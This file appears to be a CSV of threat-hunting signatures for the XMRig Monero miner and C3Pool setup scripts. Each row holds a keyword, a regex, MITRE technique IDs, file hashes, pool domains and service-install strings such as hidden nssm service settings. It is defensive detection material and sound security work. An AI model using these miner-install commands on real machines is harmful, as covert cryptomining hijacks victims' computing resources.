"*  xmrig.exe*",".{0,1000}\s\sxmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"* c3pool_miner*",".{0,1000}\sc3pool_miner.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"* --coin *--nicehash *",".{0,1000}\s\-\-coin\s.{0,1000}\-\-nicehash\s.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"* --coin=monero*",".{0,1000}\s\-\-coin\=monero.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"* --config=*c3pool*config_background.json*",".{0,1000}\s\-\-config\=.{0,1000}c3pool.{0,1000}config_background\.json.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"* --donate-level=*",".{0,1000}\s\-\-donate\-level\=.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"* install c3pool_miner *",".{0,1000}\sinstall\sc3pool_miner\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"* --nicehash *--coin *",".{0,1000}\s\-\-nicehash\s.{0,1000}\-\-coin\s.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"* set xmrig Type SERVICE_WIN32_OWN_PROCESS*",".{0,1000}\sset\sxmrig\sType\sSERVICE_WIN32_OWN_PROCESS.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*%USERPROFILE%\\nssm.zip*",".{0,1000}\%USERPROFILE\%\\\\nssm\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*/xmrig-*-gcc-win64.zip*",".{0,1000}\/xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*/xmrig.exe*",".{0,1000}\/xmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*/xmrig.git*",".{0,1000}\/xmrig\.git.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*\c3pool\\miner.bat*",".{0,1000}\\c3pool\\\\miner\.bat.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*\c3pool\config.json*",".{0,1000}\\c3pool\\config\.json.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*\WinRing0x64.sys*",".{0,1000}\\WinRing0x64\.sys.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","image loaded","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*\xmrig-*-gcc-win64.zip*",".{0,1000}\\xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*\xmrig.log*",".{0,1000}\\xmrig\.log.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*\xmrig_setup\*",".{0,1000}\\xmrig_setup\\.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*\xmrig-6.20.0*",".{0,1000}\\xmrig\-6\.20\.0.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*\xmrig-master*",".{0,1000}\\xmrig\-master.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*] Creating c3pool_miner service*",".{0,1000}\]\sCreating\sc3pool_miner\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*] Looking for the latest version of Monero miner*",".{0,1000}\]\sLooking\sfor\sthe\slatest\sversion\sof\sMonero\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*] Removing previous c3pool miner *",".{0,1000}\]\sRemoving\sprevious\sc3pool\sminer\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*] Running miner in the background*",".{0,1000}\]\sRunning\sminer\sin\sthe\sbackground.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*",".{0,1000}08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*0tZG9uYXRlLWxldmVsP*",".{0,1000}0tZG9uYXRlLWxldmVsP.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*",".{0,1000}3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*",".{0,1000}4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*",".{0,1000}5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*",".{0,1000}5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*",".{0,1000}99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*C3Pool mining setup script v*",".{0,1000}C3Pool\smining\ssetup\sscript\sv.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*C3Pool/xmrig_setup*",".{0,1000}C3Pool\/xmrig_setup.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*c3pool_miner service*",".{0,1000}c3pool_miner\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*c3pool_miner.bat*",".{0,1000}c3pool_miner\.bat.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*c3pool_miner.service*",".{0,1000}c3pool_miner\.service.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*c3pool_miner.sh*",".{0,1000}c3pool_miner\.sh.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*c3pool_miner\*",".{0,1000}c3pool_miner\\.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*cpulimit -e xmrig *",".{0,1000}cpulimit\s\-e\sxmrig\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*",".{0,1000}dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*Description=Monero miner service*",".{0,1000}Description\=Monero\sminer\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*donate.ssl.xmrig.com*",".{0,1000}donate\.ssl\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*donate.v2.xmrig.com:3333*",".{0,1000}donate\.v2\.xmrig\.com\:3333.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*donate.xmrig.com*",".{0,1000}donate\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*Downloading*%MINER_LOCATION%*",".{0,1000}Downloading.{0,1000}\%MINER_LOCATION\%.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*",".{0,1000}e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*fee.xmrig.com*",".{0,1000}fee\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*",".{0,1000}ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","#filehash","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*github*/xmrig/xmrig*",".{0,1000}github.{0,1000}\/xmrig\/xmrig.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*gpg_keys/xmrig.asc*",".{0,1000}gpg_keys\/xmrig\.asc.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*https://c3pool.com/#/*",".{0,1000}https\:\/\/c3pool\.com\/\#\/.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*killall xmrig*",".{0,1000}killall\sxmrig.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*LS1kb25hdGUtbGV2ZWw9*",".{0,1000}LS1kb25hdGUtbGV2ZWw9.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*mining in background will be started using your startup directory script and only work when your are logged in this host*",".{0,1000}mining\sin\sbackground\swill\sbe\sstarted\susing\syour\sstartup\sdirectory\sscript\sand\sonly\swork\swhen\syour\sare\slogged\sin\sthis\shost.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*Mining will happen to * wallet*",".{0,1000}Mining\swill\shappen\sto\s.{0,1000}\swallet.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*Monero miner is already running in the background*",".{0,1000}Monero\sminer\sis\salready\srunning\sin\sthe\sbackground.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*nssm set xmrig AppNoConsole 1*",".{0,1000}nssm\sset\sxmrig\sAppNoConsole\s1.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*offline_miner_setup.zip*",".{0,1000}offline_miner_setup\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*randomx.xmrig.com*",".{0,1000}randomx\.xmrig\.com.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*set xmrig start*",".{0,1000}set\sxmrig\sstart.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*setup and run in background Monero CPU miner*",".{0,1000}setup\sand\srun\sin\sbackground\sMonero\sCPU\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*solo_mine_example.cmd*",".{0,1000}solo_mine_example\.cmd.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*src/xmrig.cpp*",".{0,1000}src\/xmrig\.cpp.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*src\xmrig.cpp*",".{0,1000}src\\xmrig\.cpp.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*start doing stuff: preparing miner*",".{0,1000}start\sdoing\sstuff\:\spreparing\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*support@c3pool.com*",".{0,1000}support\@c3pool\.com.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","#email","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*WinRing0*WinRing0x64.sys*",".{0,1000}WinRing0.{0,1000}WinRing0x64\.sys.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-bionic-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-bionic\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-focal-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-focal\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-freebsd-static-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-freebsd\-static\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
